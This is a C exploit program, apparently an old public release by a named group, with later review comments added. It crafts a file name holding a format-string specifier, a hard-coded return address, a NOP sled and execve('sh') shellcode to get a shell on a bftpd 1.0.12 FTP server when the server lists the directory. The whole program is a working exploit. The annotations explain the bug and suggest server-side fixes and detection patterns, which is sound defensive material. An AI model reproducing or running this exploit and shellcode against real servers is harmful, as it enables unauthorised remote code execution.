/*
Creates a filename that exploits the bug in bftpd 1.0.12.
Create the file, CWD into the directory that holds the shell, and NLST the
directory that holds the file
(sh is executed in the working dir because it is not possible to insert a / in
the filename)

hints by |CyRaX| & Cthulhu
coded by asynchro

www.pkcrew.org
*/

#include <stdlib.h>
#include <unistd.h>

#define BUFSIZE 512
#define NOP 124

/*
 * Builds a shell command of the form "touch <name>" and runs it with
 * system(), so that a file with a crafted name is created in the current
 * directory.  The name is laid out as:
 *
 *     "%.260x" | addr | addr | NOP bytes of 0x90 | shellcode
 *
 * Nothing in this program talks to the network.  Per the header comment, the
 * file only matters once a bftpd 1.0.12 server is asked to list the directory
 * that holds it.
 *
 * NOTE(review): a literal "%.260x" inside a file name only has an effect if
 * the server hands that name to a printf-style function as the format string;
 * presumably that is the bug being exercised -- confirm against the bftpd
 * source.  For defenders the fix is server-side: never use a client-influenced
 * name as a format string, and run a release that no longer has the bug.
 * File names in an FTP tree that contain '%' conversions or long runs of 0x90
 * bytes are a reasonable thing to alert on.
 *
 * NOTE(review): memset/memcpy/strncat/strlen are called without <string.h>
 * among the visible includes, main() has no declared return type and returns
 * no value, and the malloc() result is neither checked nor freed.
 */
main()
{
int i;
char *buff;
/* The single byte that the loop below appends NOP times (0x90 is the x86 NOP opcode). */
char nop=0x90;
/* Four hard-coded bytes, 0xbffff9d4 when read little-endian; presumably an
   address inside the server process -- it is specific to one build/layout. */
char addr[]="\xd4\xf9\xff\xbf";
/* Command prefix; "%.260x" is copied literally and becomes part of the file name. */
char command[]="touch %.260x";
/* Opaque machine-code bytes ending in the text "sh"; per the header comment
   the intent is for "sh" to be executed from the server's working directory. */
char shellcode[]=

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xffsh";


/* NOTE(review): malloc() can return NULL; memset() below would then dereference it. */
buff=(char *) malloc(BUFSIZE);
memset(buff,0x0,BUFSIZE);
/* sizeof(command) includes the terminating NUL, so buff is a valid C string
   for the strncat() calls that follow. */
memcpy(buff,command,sizeof(command));

/* The same four address bytes are appended twice. */
strncat(buff,addr,4);
strncat(buff,addr,4);

for(i=0; i < NOP ;i++)
{
/* &nop is not a NUL-terminated string; the length argument of 1 limits the
   read to that single byte. */
strncat(buff,&nop,1);
}

/* The bound here is the source length, not the space left in buff; the fixed
   pieces assembled above total well under BUFSIZE. */
strncat(buff,shellcode,strlen(shellcode));
/* Runs the assembled "touch ..." line through the command interpreter; the
   return value is not checked. */
system(buff);
}
